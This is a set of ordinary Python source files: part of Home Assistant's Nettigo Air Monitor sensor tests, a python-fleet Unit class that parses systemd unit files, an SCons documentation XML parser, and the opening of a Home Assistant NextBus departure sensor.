assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_bmp280_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp280_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_bmp280_pressure")
assert state
assert state.state == "1022"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PRESSURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PRESSURE_HPA
entry = registry.async_get("sensor.nettigo_air_monitor_bmp280_pressure")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp280_pressure"
state = hass.states.get("sensor.nettigo_air_monitor_sht3x_humidity")
assert state
assert state.state == "34.7"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_sht3x_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sht3x_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_sht3x_temperature")
assert state
assert state.state == "6.3"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_sht3x_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sht3x_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_dht22_humidity")
assert state
assert state.state == "46.2"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_dht22_temperature")
assert state
assert state.state == "6.3"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_heca_humidity")
assert state
assert state.state == "50.0"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_heca_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-heca_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_heca_temperature")
assert state
assert state.state == "8.0"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_heca_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-heca_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_signal_strength")
assert state
assert state.state == "-72"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.SIGNAL_STRENGTH
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== SIGNAL_STRENGTH_DECIBELS_MILLIWATT
)
entry = registry.async_get("sensor.nettigo_air_monitor_signal_strength")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-signal"
state = hass.states.get("sensor.nettigo_air_monitor_uptime")
assert state
assert (
state.state
== (utcnow() - timedelta(seconds=456987)).replace(microsecond=0).isoformat()
)
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TIMESTAMP
assert state.attributes.get(ATTR_STATE_CLASS) is None
entry = registry.async_get("sensor.nettigo_air_monitor_uptime")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-uptime"
state = hass.states.get("sensor.nettigo_air_monitor_sds011_particulate_matter_10")
assert state
assert state.state == "19"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM10
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sds011_particulate_matter_10"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sds011_p1"
state = hass.states.get("sensor.nettigo_air_monitor_sds011_particulate_matter_2_5")
assert state
assert state.state == "11"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM25
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sds011_particulate_matter_2_5"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sds011_p2"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_1_0")
assert state
assert state.state == "31"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM1
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sps30_particulate_matter_1_0"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p0"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_10")
assert state
assert state.state == "21"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM10
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get("sensor.nettigo_air_monitor_sps30_particulate_matter_10")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p1"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_2_5")
assert state
assert state.state == "34"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM25
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sps30_particulate_matter_2_5"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p2"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_4_0")
assert state
assert state.state == "25"
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
assert state.attributes.get(ATTR_ICON) == "mdi:molecule"
entry = registry.async_get(
"sensor.nettigo_air_monitor_sps30_particulate_matter_4_0"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p4"
state = hass.states.get("sensor.nettigo_air_monitor_mh_z14a_carbon_dioxide")
assert state
assert state.state == "865"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.CO2
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_PARTS_PER_MILLION
)
entry = registry.async_get("sensor.nettigo_air_monitor_mh_z14a_carbon_dioxide")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-mhz14a_carbon_dioxide"
async def test_sensor_disabled(hass):
"""Test sensor disabled by default."""
await init_integration(hass)
registry = er.async_get(hass)
entry = registry.async_get("sensor.nettigo_air_monitor_signal_strength")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-signal"
assert entry.disabled
assert entry.disabled_by is er.RegistryEntryDisabler.INTEGRATION
# Test enabling entity
updated_entry = registry.async_update_entity(
entry.entity_id, **{"disabled_by": None}
)
assert updated_entry != entry
assert updated_entry.disabled is False
async def test_incompleta_data_after_device_restart(hass):
"""Test states of the air_quality after device restart."""
await init_integration(hass)
state = hass.states.get("sensor.nettigo_air_monitor_heca_temperature")
assert state
assert state.state == "8.0"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
future = utcnow() + timedelta(minutes=6)
update_response = Mock(json=AsyncMock(return_value=INCOMPLETE_NAM_DATA))
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
return_value=update_response,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.nettigo_air_monitor_heca_temperature")
assert state
assert state.state == STATE_UNAVAILABLE
async def test_availability(hass):
"""Ensure that we mark the entities unavailable correctly when device causes an error."""
await init_integration(hass)
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state != STATE_UNAVAILABLE
assert state.state == "7.6"
future = utcnow() + timedelta(minutes=6)
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
side_effect=ApiError("API Error"),
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state == STATE_UNAVAILABLE
future = utcnow() + timedelta(minutes=12)
update_response = Mock(json=AsyncMock(return_value=nam_data))
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
return_value=update_response,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state != STATE_UNAVAILABLE
assert state.state == "7.6"
async def test_manual_update_entity(hass):
"""Test manual update entity via service homeasasistant/update_entity."""
await init_integration(hass)
await async_setup_component(hass, "homeassistant", {})
update_response = Mock(json=AsyncMock(return_value=nam_data))
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
return_value=update_response,
) as mock_get_data:
await hass.services.async_call(
"homeassistant",
"update_entity",
{ATTR_ENTITY_ID: ["sensor.nettigo_air_monitor_bme280_temperature"]},
blocking=True,
)
assert mock_get_data.call_count == 1
async def test_unique_id_migration(hass):
"""Test states of the unique_id migration."""
registry = er.async_get(hass)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-temperature",
suggested_object_id="nettigo_air_monitor_dht22_temperature",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-humidity",
suggested_object_id="nettigo_air_monitor_dht22_humidity",
disabled_by=None,
)
await init_integration(hass)
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_temperature"
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_humidity"
|
|
from .fleet_object import FleetObject
try: # pragma: no cover
# python 2
from StringIO import StringIO
except ImportError: # pragma: no cover
# python 3
from io import StringIO
class Unit(FleetObject):
"""This object represents a Unit in Fleet
Create and modify Unit entities to communicate to fleet the desired state of the cluster.
This simply declares what should be happening; the backend system still has to react to the changes in
this desired state. The actual state of the system is communicated with UnitState entities.
Attributes (all are readonly):
Always available:
options (update with add_option, remove_option): list of UnitOption entities
desiredState: (update with set_desired_state): state the user wishes the Unit to be in
("inactive", "loaded", or "launched")
Available once units are submitted to fleet:
name: unique identifier of entity
currentState: state the Unit is currently in (same possible values as desiredState)
machineID: ID of machine to which the Unit is scheduled
A UnitOption represents a single option in a systemd unit file.
section: name of section that contains the option (e.g. "Unit", "Service", "Socket")
name: name of option (e.g. "BindsTo", "After", "ExecStart")
value: value of option (e.g. "/usr/bin/docker run busybox /bin/sleep 1000")
"""
_STATES = ['inactive', 'loaded', 'launched']
def __init__(self, client=None, data=None, desired_state=None, options=None, from_file=None, from_string=None):
"""Create a new unit
Args:
client (fleet.v1.Client, optional): The fleet client that retrieved this object
data (dict, optional): Initialize this object with this data. If this is used you must not
specify options, desired_state, from_file, or from_string
desired_state (string, optional): The desired_state for this object, defaults to 'launched' if not specified
If you do not specify data, You may specify one of the following args to initialize the object:
options (list, optional): A list of options to initialize the object with.
from_file (str, optional): Initialize this object from the unit file on disk at this path
from_string (str, optional): Initialize this object from the unit file in this string
If none are specified, an empty unit will be created
Raises:
IOError: from_file was specified and it does not exist
ValueError: Conflicting options, or The unit contents specified in from_string or from_file is not valid
"""
# make sure if they specify data, then they didn't specify anything else
if data and (desired_state or options or from_file or from_string):
raise ValueError('If you specify data you can not specify desired_state,'
'options, from_file, or from_string')
# count how many of options, from_file, from_string we have
given = 0
for thing in [options, from_file, from_string]:
if thing:
given += 1
# we should only have one, if we have more, yell at them
if given > 1:
raise ValueError('You must specify only one of options, from_file, from_string')
# ensure we have a minimum structure if we aren't passed one
if data is None:
# we set this here, instead as a default value to the arg
# as we want to be able to check it vs data above, it should be None in that case
if desired_state is None:
desired_state = 'launched'
if options is None:
options = []
# Minimum structure required by fleet
data = {
'desiredState': desired_state,
'options': options
}
# Call the parent class to configure us
super(Unit, self).__init__(client=client, data=data)
# If they asked us to load from a file, attemp to slurp it up
if from_file:
with open(from_file, 'r') as fh:
self._set_options_from_file(fh)
# If they asked us to load from a string, lie to the loader with StringIO
if from_string:
self._set_options_from_file(StringIO(from_string))
def __repr__(self):
return '<{0}: {1}>'.format(
self.__class__.__name__,
self.as_dict()
)
def __str__(self):
"""Generate a Unit file representation of this object"""
# build our output here
output = []
# get a ist of sections
sections = set([x['section'] for x in self._data['options']])
for section in sections:
# for each section, add it to our output
output.append(u'[{0}]'.format(section))
# iterate through the list of options, adding all items to this section
for option in self._data['options']:
if option['section'] == section:
output.append(u'{0}={1}'.format(option['name'], option['value']))
# join and return the output
return u"\n".join(output)
def _set_options_from_file(self, file_handle):
"""Parses a unit file and updates self._data['options']
Args:
file_handle (file): a file-like object (supporting read()) containing a unit
Returns:
True: The file was successfuly parsed and options were updated
Raises:
IOError: from_file was specified and it does not exist
ValueError: The unit contents specified in from_string or from_file is not valid
"""
# TODO: Find a library to handle this unit file parsing
# Can't use configparser, it doesn't handle multiple entries for the same key in the same section
# This is terribly naive
# build our output here
options = []
# keep track of line numbers to report when parsing problems happen
line_number = 0
# the section we are currently in
section = None
for line in file_handle.read().splitlines():
line_number += 1
# clear any extra white space
orig_line = line
line = line.strip()
# ignore comments, and blank lines
if not line or line.startswith('#'):
continue
# is this a section header? If so, update our variable and continue
# Section headers look like: [Section]
if line.startswith('[') and line.endswith(']'):
section = line.strip('[]')
continue
# We encountered a non blank line outside of a section, this is a problem
if not section:
raise ValueError(
'Unable to parse unit file; '
'Unexpected line outside of a section: {0} (line: {1}'.format(
line,
line_number
))
# Attempt to parse a line inside a section
# Lines should look like: name=value \
# continuation
continuation = False
try:
# if the previous value ends with \ then we are a continuation
# so remove the \, and set the flag so we'll append to this below
if options[-1]['value'].endswith('\\'):
options[-1]['value'] = options[-1]['value'][:-1]
continuation = True
except IndexError:
pass
try:
# if we are a continuation, then just append our value to the previous line
if continuation:
options[-1]['value'] += orig_line
continue
# else we are a normal line, so spit and get our name / value
name, value = line.split('=', 1)
options.append({
'section': section,
'name': name,
'value': value
})
except ValueError:
raise ValueError(
'Unable to parse unit file; '
'Malformed line in section {0}: {1} (line: {2})'.format(
section,
line,
line_number
))
# update our internal structure
self._data['options'] = options
return True
def _is_live(self):
"""Checks to see if this unit came from fleet, or was created locally
Only units with a .name property (set by the server), and _client property are considered 'live'
Returns:
True: The object is live
False: The object is not
"""
if 'name' in self._data and self._client:
return True
return False
def add_option(self, section, name, value):
"""Add an option to a section of the unit file
Args:
section (str): The name of the section, If it doesn't exist it will be created
name (str): The name of the option to add
value (str): The value of the option
Returns:
True: The item was added
"""
# Don't allow updating units we loaded from fleet, it's not supported
if self._is_live():
raise RuntimeError('Submitted units cannot update their options')
option = {
'section': section,
'name': name,
'value': value
}
self._data['options'].append(option)
return True
def remove_option(self, section, name, value=None):
"""Remove an option from a unit
Args:
section (str): The section to remove from.
name (str): The item to remove.
value (str, optional): If specified, only the option matching this value will be removed
If not specified, all options with ``name`` in ``section`` will be removed
Returns:
True: At least one item was removed
False: The item requested to remove was not found
"""
# Don't allow updating units we loaded from fleet, it's not supported
if self._is_live():
raise RuntimeError('Submitted units cannot update their options')
removed = 0
# iterate through a copy of the options
for option in list(self._data['options']):
# if it's in our section
if option['section'] == section:
# and it matches our name
if option['name'] == name:
# and they didn't give us a value, or it macthes
if value is None or option['value'] == value:
# nuke it from the source
self._data['options'].remove(option)
removed += 1
if removed > 0:
return True
return False
def destroy(self):
"""Remove a unit from the fleet cluster
Returns:
True: The unit was removed
Raises:
fleet.v1.errors.APIError: Fleet returned a response code >= 400
"""
# if this unit didn't come from fleet, we can't destroy it
if not self._is_live():
raise RuntimeError('A unit must be submitted to fleet before it can destroyed.')
return self._client.destroy_unit(self.name)
def set_desired_state(self, state):
"""Update the desired state of a unit.
Args:
state (str): The desired state for the unit, must be one of ``_STATES``
Returns:
str: The updated state
Raises:
fleet.v1.errors.APIError: Fleet returned a response code >= 400
ValueError: An invalid value for ``state`` was provided
"""
if state not in self._STATES:
raise ValueError(
'state must be one of: {0}'.format(
self._STATES
))
# update our internal structure
self._data['desiredState'] = state
# if we have a name, then we came from the server
# and we have a handle to an active client
# Then update our selves on the server
if self._is_live():
self._update('_data', self._client.set_unit_desired_state(self.name, self.desiredState))
# Return the state
return self._data['desiredState']
|
|
#!/usr/bin/env python
#
# Module for handling SCons documentation processing.
#
__doc__ = """
This module parses home-brew XML files that document various things
in SCons. Right now, it handles Builders, functions, construction
variables, and Tools, but we expect it to get extended in the future.
In general, you can use any DocBook tag in the input, and this module
just adds processing various home-brew tags to try to make life a
little easier.
Builder example:
<builder name="BUILDER">
<summary>
This is the summary description of an SCons Builder.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any builder may be interpolated
anywhere in the document by specifying the
&b-BUILDER;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</builder>
Function example:
<scons_function name="FUNCTION">
<arguments>
(arg1, arg2, key=value)
</arguments>
<summary>
This is the summary description of an SCons function.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any builder may be interpolated
anywhere in the document by specifying the
&f-FUNCTION;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</scons_function>
Construction variable example:
<cvar name="VARIABLE">
<summary>
This is the summary description of a construction variable.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any construction variable may be interpolated
anywhere in the document by specifying the
&t-VARIABLE;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</cvar>
Tool example:
<tool name="TOOL">
<summary>
This is the summary description of an SCons Tool.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any tool may be interpolated
anywhere in the document by specifying the
&t-TOOL;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</tool>
"""
import imp
import os.path
import re
import sys
import xml.sax.handler
class Item(object):
def __init__(self, name):
self.name = name
self.sort_name = name.lower()
if self.sort_name[0] == '_':
self.sort_name = self.sort_name[1:]
self.summary = []
self.sets = None
self.uses = None
def cmp_name(self, name):
if name[0] == '_':
name = name[1:]
return name.lower()
def __cmp__(self, other):
return cmp(self.sort_name, other.sort_name)
class Builder(Item):
pass
class Function(Item):
def __init__(self, name):
super(Function, self).__init__(name)
self.arguments = []
class Tool(Item):
def __init__(self, name):
Item.__init__(self, name)
self.entity = self.name.replace('+', 'X')
class ConstructionVariable(Item):
pass
class Chunk(object):
def __init__(self, tag, body=None):
self.tag = tag
if not body:
body = []
self.body = body
def __str__(self):
body = ''.join(self.body)
return "<%s>%s</%s>\n" % (self.tag, body, self.tag)
def append(self, data):
self.body.append(data)
class Arguments(object):
def __init__(self, signature, body=None):
if not body:
body = []
self.body = body
self.signature = signature
def __str__(self):
s = ''.join(self.body).strip()
result = []
for m in re.findall('([a-zA-Z/_]+|[^a-zA-Z/_]+)', s):
if ' ' in m:
m = '"%s"' % m
result.append(m)
return ' '.join(result)
def append(self, data):
self.body.append(data)
class Summary(object):
def __init__(self):
self.body = []
self.collect = []
def append(self, data):
self.collect.append(data)
def end_para(self):
text = ''.join(self.collect)
paras = text.split('\n\n')
if paras == ['\n']:
return
if paras[0] == '':
self.body.append('\n')
paras = paras[1:]
paras[0] = '\n' + paras[0]
if paras[-1] == '':
paras = paras[:-1]
paras[-1] = paras[-1] + '\n'
last = '\n'
else:
last = None
sep = None
for p in paras:
c = Chunk("para", p)
if sep:
self.body.append(sep)
self.body.append(c)
sep = '\n'
if last:
self.body.append(last)
def begin_chunk(self, chunk):
self.end_para()
self.collect = chunk
def end_chunk(self):
self.body.append(self.collect)
self.collect = []
class SConsDocHandler(xml.sax.handler.ContentHandler,
xml.sax.handler.ErrorHandler):
def __init__(self):
self._start_dispatch = {}
self._end_dispatch = {}
keys = list(self.__class__.__dict__.keys())
start_tag_method_names = [k for k in keys if k[:6] == 'start_']
end_tag_method_names = [k for k in keys if k[:4] == 'end_']
for method_name in start_tag_method_names:
tag = method_name[6:]
self._start_dispatch[tag] = getattr(self, method_name)
for method_name in end_tag_method_names:
tag = method_name[4:]
self._end_dispatch[tag] = getattr(self, method_name)
self.stack = []
self.collect = []
self.current_object = []
self.builders = {}
self.functions = {}
self.tools = {}
self.cvars = {}
def startElement(self, name, attrs):
try:
start_element_method = self._start_dispatch[name]
except KeyError:
self.characters('<%s>' % name)
else:
start_element_method(attrs)
def endElement(self, name):
try:
end_element_method = self._end_dispatch[name]
except KeyError:
self.characters('</%s>' % name)
else:
end_element_method()
#
#
def characters(self, chars):
self.collect.append(chars)
def begin_collecting(self, chunk):
self.collect = chunk
def end_collecting(self):
self.collect = []
def begin_chunk(self):
pass
def end_chunk(self):
pass
#
#
#
def begin_xxx(self, obj):
self.stack.append(self.current_object)
self.current_object = obj
def end_xxx(self):
self.current_object = self.stack.pop()
#
#
#
def start_scons_doc(self, attrs):
pass
def end_scons_doc(self):
pass
def start_builder(self, attrs):
name = attrs.get('name')
try:
builder = self.builders[name]
except KeyError:
builder = Builder(name)
self.builders[name] = builder
self.begin_xxx(builder)
def end_builder(self):
self.end_xxx()
def start_scons_function(self, attrs):
name = attrs.get('name')
try:
function = self.functions[name]
except KeyError:
function = Function(name)
self.functions[name] = function
self.begin_xxx(function)
def end_scons_function(self):
self.end_xxx()
def start_tool(self, attrs):
name = attrs.get('name')
try:
tool = self.tools[name]
except KeyError:
tool = Tool(name)
self.tools[name] = tool
self.begin_xxx(tool)
def end_tool(self):
self.end_xxx()
def start_cvar(self, attrs):
name = attrs.get('name')
try:
cvar = self.cvars[name]
except KeyError:
cvar = ConstructionVariable(name)
self.cvars[name] = cvar
self.begin_xxx(cvar)
def end_cvar(self):
self.end_xxx()
def start_arguments(self, attrs):
arguments = Arguments(attrs.get('signature', "both"))
self.current_object.arguments.append(arguments)
self.begin_xxx(arguments)
self.begin_collecting(arguments)
def end_arguments(self):
self.end_xxx()
def start_summary(self, attrs):
summary = Summary()
self.current_object.summary = summary
self.begin_xxx(summary)
self.begin_collecting(summary)
def end_summary(self):
self.current_object.end_para()
self.end_xxx()
def start_example(self, attrs):
example = Chunk("programlisting")
self.current_object.begin_chunk(example)
def end_example(self):
self.current_object.end_chunk()
def start_uses(self, attrs):
self.begin_collecting([])
def end_uses(self):
self.current_object.uses = sorted(''.join(self.collect).split())
self.end_collecting()
def start_sets(self, attrs):
self.begin_collecting([])
def end_sets(self):
self.current_object.sets = sorted(''.join(self.collect).split())
self.end_collecting()
# Stuff for the ErrorHandler portion.
def error(self, exception):
linenum = exception._linenum - self.preamble_lines
sys.stderr.write('%s:%d:%d: %s (error)\n' % (self.filename, linenum, exception._colnum, ''.join(exception.args)))
def fatalError(self, exception):
linenum = exception._linenum - self.preamble_lines
sys.stderr.write('%s:%d:%d: %s (fatalError)\n' % (self.filename, linenum, exception._colnum, ''.join(exception.args)))
def set_file_info(self, filename, preamble_lines):
self.filename = filename
self.preamble_lines = preamble_lines
# lifted from Ka-Ping Yee's way cool pydoc module.
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except ImportError, e:
sys.stderr.write("Could not import %s: %s\n" % (path, e))
return None
file.close()
return module
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
|
"""NextBus sensor."""
from itertools import chain
import logging
from py_nextbus import NextBusClient
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, DEVICE_CLASS_TIMESTAMP
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util.dt import utc_from_timestamp
_LOGGER = logging.getLogger(__name__)
DOMAIN = "nextbus"
CONF_AGENCY = "agency"
CONF_ROUTE = "route"
CONF_STOP = "stop"
ICON = "mdi:bus"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_AGENCY): cv.string,
vol.Required(CONF_ROUTE): cv.string,
vol.Required(CONF_STOP): cv.string,
vol.Optional(CONF_NAME): cv.string,
}
)
def listify(maybe_list):
"""Return list version of whatever value is passed in.
This is used to provide a consistent way of interacting with the JSON
results from the API. There are several attributes that will either missing
if there are no values, a single dictionary if there is only one value, and
a list if there are multiple.
"""
if maybe_list is None:
return []
if isinstance(maybe_list, list):
return maybe_list
return [maybe_list]
def maybe_first(maybe_list):
"""Return the first item out of a list or returns back the input."""
if isinstance(maybe_list, list) and maybe_list:
return maybe_list[0]
return maybe_list
def validate_value(value_name, value, value_list):
"""Validate tag value is in the list of items and logs error if not."""
valid_values = {v["tag"]: v["title"] for v in value_list}
if value not in valid_values:
_LOGGER.error(
"Invalid %s tag `%s`. Please use one of the following: %s",
value_name,
value,
", ".join(f"{title}: {tag}" for tag, title in valid_values.items()),
)
return False
return True
def validate_tags(client, agency, route, stop):
"""Validate provided tags."""
# Validate agencies
if not validate_value("agency", agency, client.get_agency_list()["agency"]):
return False
# Validate the route
if not validate_value("route", route, client.get_route_list(agency)["route"]):
return False
# Validate the stop
route_config = client.get_route_config(route, agency)["route"]
if not validate_value("stop", stop, route_config["stop"]):
return False
return True
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Load values from configuration and initialize the platform."""
agency = config[CONF_AGENCY]
route = config[CONF_ROUTE]
stop = config[CONF_STOP]
name = config.get(CONF_NAME)
client = NextBusClient(output_format="json")
# Ensures that the tags provided are valid, also logs out valid values
if not validate_tags(client, agency, route, stop):
_LOGGER.error("Invalid config value(s)")
return
add_entities([NextBusDepartureSensor(client, agency, route, stop, name)], True)
class NextBusDepartureSensor(Entity):
"""Sensor class that displays upcoming NextBus times.
To function, this requires knowing the agency tag as well as the tags for
both the route and the stop.
This is possibly a little convoluted to provide as it requires making a
request to the service to get these values. Perhaps it can be simplifed in
the future using fuzzy logic and matching.
"""
def __init__(self, client, agency, route, stop, name=None):
"""Initialize sensor with all required config."""
self.agency = agency
self.route = route
self.stop = stop
self._custom_name = name
